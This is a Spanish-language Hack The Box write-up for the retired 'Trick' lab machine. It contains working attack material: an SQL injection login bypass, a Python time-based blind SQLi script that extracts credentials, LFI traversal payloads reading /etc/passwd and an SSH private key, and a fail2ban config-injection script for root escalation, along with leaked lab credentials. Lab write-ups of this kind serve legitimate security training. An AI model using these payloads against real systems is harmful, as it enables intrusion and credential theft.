Maquina Retirada Trick de Hack The Box (Necesario VIP)
Published on 27 Jun 2022
Trick ~ Hack The Box
Realizamos el Primer escaneo con Nmap
$" nmap -p- --open -sS --min-rate 4000 -vvv -n -Pn -oG allports 10.10.11.166 "
Procedemos con el siguiente escaneo de Nmap
$" nmap -sC -sV -p -oN target 10.10.11.166"
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 61:ff:29:3b:36:bd:9d:ac:fb:de:1f:56:88:4c:ae:2d (RSA)
| 256 9e:cd:f2:40:61:96:ea:21:a6:ce:26:02:af:75:9a:78 (ECDSA)
|_ 256 72:93:f9:11:58:de:34:ad:12:b5:4b:4a:73:64:b9:70 (ED25519)
25/tcp open smtp?
|_smtp-commands: Couldn't establish connection on port 25
53/tcp open domain ISC BIND 9.11.5-P4-5.1+deb10u7 (Debian Linux)
| dns-nsid:
|_ bind.version: 9.11.5-P4-5.1+deb10u7-Debian
80/tcp open http nginx 1.14.2
|_http-title: Coming Soon - Start Bootstrap Theme
|_http-server-header: nginx/1.14.2
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Whatweb
http://10.129.116.251 [200 OK] Bootstrap, Country[RESERVED][ZZ], HTML5, HTTPServer[nginx/1.14.2], IP[10.129.116.251], Script, Title[Coming Soon - Start Bootstrap Theme], nginx[1.14.2]
Procedemos con el puerto 53 DNS
# dig axfr @10.10.11.166 trick.htb
; <<>> DiG 9.16.11-Debian <<>> axfr @10.10.11.166 trick.htb
; (1 server found)
;; global options: +cmd
trick.htb. 604800 IN SOA trick.htb. root.trick.htb. 5 604800 86400 2419200 604800
trick.htb. 604800 IN NS trick.htb.
trick.htb. 604800 IN A 127.0.0.1
trick.htb. 604800 IN AAAA ::1
preprod-payroll.trick.htb. 604800 IN CNAME trick.htb.
trick.htb. 604800 IN SOA trick.htb. root.trick.htb. 5 604800 86400 2419200 604800
;; Query time: 188 msec
;; SERVER: 10.10.11.166#53(10.10.11.166)
;; WHEN: dom jun 26 11:10:56 CEST 2022
;; XFR size: 6 records (messages 1, bytes 231)
Encontramos el subdominio preprod-payroll.trick.htb
Fuzzing
# dirsearch -u http://preprod-payroll.trick.htb -l /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x 404 1 ⚙
_|. _ _ _ _ _ _|_ v0.4.1
(_||| _) (/_(_|| (_| )
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 30 | Wordlist size: 10877
Target: http://preprod-payroll.trick.htb/
[12:03:56] Starting:
[12:04:05] 200 - 0B - /ajax.php
[12:04:05] 301 - 185B - /assets -> http://preprod-payroll.trick.htb/assets/
[12:04:05] 403 - 571B - /assets/
[12:04:07] 301 - 185B - /database -> http://preprod-payroll.trick.htb/database/
[12:04:07] 403 - 571B - /database/
[12:04:09] 200 - 2KB - /header.php
[12:04:09] 200 - 486B - /home.php
[12:04:10] 302 - 9KB - /index.php -> login.php
[12:04:10] 200 - 5KB - /login.php
[12:04:13] 200 - 149B - /readme.txt
[12:04:16] 200 - 2KB - /users.php
Procedemos enumerando el subdominio, encontramos en el login una inyeccion SQLI Blind TimeBased
admin' or 1=1-- -
Una vez accedemos a la web como administradores encontramos un LFI en la siguiente ruta:
http://preprod-payroll.trick.htb/index.php?page=home
http://preprod-payroll.trick.htb/index.php?page=php://filter/convert.base64-encode/resource=db_connect
Recibimos el contenido de los archivos en base64
# cat db-connection.php
<?php
$conn= new mysqli('localhost','remo','TrulyImpossiblePasswordLmao123','payroll_db')or die("Could not connect to mysql".mysqli_error($con));
Profundizando en la Inyeccion SQL montamos un script para averiguar los datos username & password
#!/usr/bin/python3
import os
import sys
import requests
import signal
import pdb
import time
from pwn import *
def Saliendo(sig, frame):
print("\n[*] Saliendo...\n")
sys.exit(1)
# Ctrl + C
signal.signal(signal.SIGINT, Saliendo)
# Variables Globales
main_url = "http://preprod-payroll.trick.htb/ajax.php?action=login"
s = r'abcdefghijklmnñopqrstuvwxyz'
def sqli_post():
username = ""
p1 = log.progress("Payload")
p2 = log.progress("Nombre de la Columna de Datos")
for position in range(1,50):
for character in s:
login_data = {
'username': "admin' or if(substr((select group_concat(username,0x3a,password) from users),%d,1)='%c',sleep(5),1)-- -" % (position, character),
'password': '#'
}
p1.status("--> %s" % login_data)
time_start = time.time()
requests.post(main_url, data=login_data)
time_end = time.time()
if time_end - time_start > 5:
username += character
p2.status(username)
break
if __name__=='__main__':
sqli_post()
Uso exploit.py
# python3 exploit.py
[▃] Payload: --> {'username': "admin' or if(substr((select group_concat(username,0x3a,password) from users),49,1)='z',sleep(5),1)-- -", 'password': '#'}
[.] Nombre de la Columna de Datos: enemigosss;superguccirainbowcake
Procedemos a seguir enumerando subdominios con wfuzz
# wfuzz -c --hc=404 --hh=5480 -t 200 -w /opt/SecLists/Discovery/DNS/subdomains-top1million-5000.txt -H 'Host: preprod-FUZZ.trick.htb' http://preprod-payroll.trick.htb/
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer *
********************************************************
Target: http://preprod-payroll.trick.htb/
Total requests: 4989
=====================================================================
ID Response Lines Word Chars Payload
=====================================================================
000000254: 200 178 L 631 W 9660 Ch "marketing"
Encontramos el siguiente subdominio preprod-marketing.trick.htb
Procedemos a echar un vistazo y encontramos que tambien tiene un LFI
http://preprod-marketing.trick.htb/index.php?page=....//....//....//....//....//....//....//....//etc/hosts
Output -->
127.0.0.1 localhost 127.0.1.1 trick
Procedemos a buscar el /etc/passwd
# view-source:http://preprod-marketing.trick.htb/index.php?page=....//....//....//....//....//....//....//....//etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
systemd-timesync:x:101:102:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
systemd-network:x:102:103:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:103:104:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:104:110::/nonexistent:/usr/sbin/nologin
tss:x:105:111:TPM2 software stack,,,:/var/lib/tpm:/bin/false
dnsmasq:x:106:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin
usbmux:x:107:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin
rtkit:x:108:114:RealtimeKit,,,:/proc:/usr/sbin/nologin
pulse:x:109:118:PulseAudio daemon,,,:/var/run/pulse:/usr/sbin/nologin
speech-dispatcher:x:110:29:Speech Dispatcher,,,:/var/run/speech-dispatcher:/bin/false
avahi:x:111:120:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/usr/sbin/nologin
saned:x:112:121::/var/lib/saned:/usr/sbin/nologin
colord:x:113:122:colord colour management daemon,,,:/var/lib/colord:/usr/sbin/nologin
geoclue:x:114:123::/var/lib/geoclue:/usr/sbin/nologin
hplip:x:115:7:HPLIP system user,,,:/var/run/hplip:/bin/false
Debian-gdm:x:116:124:Gnome Display Manager:/var/lib/gdm3:/bin/false
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
mysql:x:117:125:MySQL Server,,,:/nonexistent:/bin/false
sshd:x:118:65534::/run/sshd:/usr/sbin/nologin
postfix:x:119:126::/var/spool/postfix:/usr/sbin/nologin
bind:x:120:128::/var/cache/bind:/usr/sbin/nologin
"michael":x:1001:1001::/home/michael:/bin/bash
Apuntamos a sacar la id_rsa del user michael /home/michael/.ssh/id_rsa
-----BEGIN OPENSSH PRIVATE KEY-----
b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABFwAAAAdzc2gtcn
NhAAAAAwEAAQAAAQEAwI9YLFRKT6JFTSqPt2/+7mgg5HpSwzHZwu95Nqh1Gu4+9P+ohLtz
c4jtky6wYGzlxKHg/Q5ehozs9TgNWPVKh+j92WdCNPvdzaQqYKxw4Fwd3K7F4JsnZaJk2G
YQ2re/gTrNElMAqURSCVydx/UvGCNT9dwQ4zna4sxIZF4HpwRt1T74wioqIX3EAYCCZcf+
4gAYBhUQTYeJlYpDVfbbRH2yD73x7NcICp5iIYrdS455nARJtPHYkO9eobmyamyNDgAia/
Ukn75SroKGUMdiJHnd+m1jW5mGotQRxkATWMY5qFOiKglnws/jgdxpDV9K3iDTPWXFwtK4
1kC+t4a8sQAAA8hzFJk2cxSZNgAAAAdzc2gtcnNhAAABAQDAj1gsVEpPokVNKo+3b/7uaC
DkelLDMdnC73k2qHUa7j70/6iEu3NziO2TLrBgbOXEoeD9Dl6GjOz1OA1Y9UqH6P3ZZ0I0
+93NpCpgrHDgXB3crsXgmydlomTYZhDat7+BOs0SUwCpRFIJXJ3H9S8YI1P13BDjOdrizE
hkXgenBG3VPvjCKiohfcQBgIJlx/7iABgGFRBNh4mVikNV9ttEfbIPvfHs1wgKnmIhit1L
jnmcBEm08diQ716hubJqbI0OACJr9SSfvlKugoZQx2Iked36bWNbmYai1BHGQBNYxjmoU6
IqCWfCz+OB3GkNX0reINM9ZcXC0rjWQL63hryxAAAAAwEAAQAAAQASAVVNT9Ri/dldDc3C
aUZ9JF9u/cEfX1ntUFcVNUs96WkZn44yWxTAiN0uFf+IBKa3bCuNffp4ulSt2T/mQYlmi/
KwkWcvbR2gTOlpgLZNRE/GgtEd32QfrL+hPGn3CZdujgD+5aP6L9k75t0aBWMR7ru7EYjC
tnYxHsjmGaS9iRLpo79lwmIDHpu2fSdVpphAmsaYtVFPSwf01VlEZvIEWAEY6qv7r455Ge
U+38O714987fRe4+jcfSpCTFB0fQkNArHCKiHRjYFCWVCBWuYkVlGYXLVlUcYVezS+ouM0
fHbE5GMyJf6+/8P06MbAdZ1+5nWRmdtLOFKF1rpHh43BAAAAgQDJ6xWCdmx5DGsHmkhG1V
PH+7+Oono2E7cgBv7GIqpdxRsozETjqzDlMYGnhk9oCG8v8oiXUVlM0e4jUOmnqaCvdDTS
3AZ4FVonhCl5DFVPEz4UdlKgHS0LZoJuz4yq2YEt5DcSixuS+Nr3aFUTl3SxOxD7T4tKXA
fvjlQQh81veQAAAIEA6UE9xt6D4YXwFmjKo+5KQpasJquMVrLcxKyAlNpLNxYN8LzGS0sT
AuNHUSgX/tcNxg1yYHeHTu868/LUTe8l3Sb268YaOnxEbmkPQbBscDerqEAPOvwHD9rrgn
In16n3kMFSFaU2bCkzaLGQ+hoD5QJXeVMt6a/5ztUWQZCJXkcAAACBANNWO6MfEDxYr9DP
JkCbANS5fRVNVi0Lx+BSFyEKs2ThJqvlhnxBs43QxBX0j4BkqFUfuJ/YzySvfVNPtSb0XN
jsj51hLkyTIOBEVxNjDcPWOj5470u21X8qx2F3M4+YGGH+mka7P+VVfvJDZa67XNHzrxi+
IJhaN0D5bVMdjjFHAAAADW1pY2hhZWxAdHJpY2sBAgMEBQ==
-----END OPENSSH PRIVATE KEY-----
Procedemos a darle permisos chmod 600 id_rsa y conectarnos por ssh
# ssh -i id_rsa michael@10.10.11.166 1 ⚙
Linux trick 4.19.0-20-amd64 #1 SMP Debian 4.19.235-1 (2022-03-17) x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
michael@trick:~$
Procedemos a enumerar un poco el systema
michael@trick:~$ uname -a
Linux trick 4.19.0-20-amd64 #1 SMP Debian 4.19.235-1 (2022-03-17) x86_64 GNU/Linux
michael@trick:~$ id
uid=1001(michael) gid=1001(michael) groups=1001(michael),1002("security")
michael@trick:~$ find / -group security 2>/dev/null
"/etc/fail2ban/action.d"
michael@trick:~$ sudo -l
Matching Defaults entries for michael on trick:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User michael may run the following commands on trick:
"(root) NOPASSWD: /etc/init.d/fail2ban restart"
michael@trick:~$ ls -l /etc/fail2ban/
total 60
drwxrwx--- 2 root "security" 4096 Jun 27 13:39 action.d
Buscando informacion sobre fail2ban encontramos una posible escalada de privilegions atraves del fichero iptables-multiport.conf donde podemos intentar a ejecutar un comando [Configurandolo en este fichero] para posteriormente bruteforcear SSH para que el Fail2ban nos banee y aplique el comando que le inyectamos como el usuario root.
#!/bin/bash
file="/etc/fail2ban/action.d/iptables-multiport.conf"
fs=$(cat "$file")
rm -f /etc/fail2ban/action.d/iptables-multiport.conf
touch /tmp/flag.txt
res=$(echo "$fs" | sed "s/<iptables> -I f2b-<name> 1 -s <ip> -j <blocktype>/ cat \/root\/root.txt >> \/tmp\/flag.txt /g") # instead of "cat \/root\/root.txt > \/tmp\/root.txt" u can use ur own payload
echo "$res" >> /etc/fail2ban/action.d/iptables-multiport.conf
sudo /etc/init.d/fail2ban restart
sleep 15
echo "Done! Brute ssh now! Leave ur hydra or whatever u use just for 1min to work. Check /tmp/flag.txt after"
Conseguimos la Flag.txt
michael@trick:/tmp$ ls
flag.txt
michael@trick:/tmp$ cat flag.txt
02db5c7fa69a5a1xxxxxxxxxxxxxxxx
Maquina Rooteada =) Follow Hard to OSCP